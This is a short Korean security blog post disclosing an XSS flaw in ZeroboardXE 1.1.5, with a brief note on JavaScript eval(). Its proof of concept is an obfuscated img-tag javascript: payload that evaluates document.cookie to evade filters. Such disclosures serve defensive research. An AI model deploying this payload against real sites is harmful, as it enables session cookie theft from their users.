제로보드XE 1.1.5 버전에서 XSS 취약점이 발견 되었습니다.

POC :
<img lowsrc="j a v a s c ri pt:alert((eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t' +'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase())));">

※참고 eval() 함수
Javascript 코드가 맞는가 틀린가를 검증하고 수행한다.

→ 검증 순서
1. 제공된 jsString 문자열이 Javascript로 유효한가
2. Javascript 코드로서 해석하기 우해서 파싱(Parse)
3. 파싱된 내용에서 Javascript 문장 코드를 발견하면 그 내용을 숭
4. 수행 결과 값이 있으면 반환(return)
Posted by n3015m
:
BLOG main image
'네오이즘'의 보안LAB 블로그입니다........... n3oism@gmail.com by n3015m

카테고리

분류 전체보기 (228)
[ HappyDevTool ] (29)
[ HappyToolRelease ] (4)
[Book] (6)
[ Security Studies ] (0)
- CII (2)
- BigData (2)
- Web Hacking (10)
- SQL Injection (25)
- Mobile Security (9)
- Network (6)
- OperatingSystem (4)
- Malware & Reversing (4)
- Phishing (5)
- Compliance (0)
- Programming (13)
- Tools (13)
- IoT (6)
- etc (21)
[Pentration Testing] (3)
[OS X] (4)
[ Security Trends ] (16)
[ Fixing Guideline ] (7)
My Way, My Life (34)
About Me (2)

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

Total :
Today : Yesterday :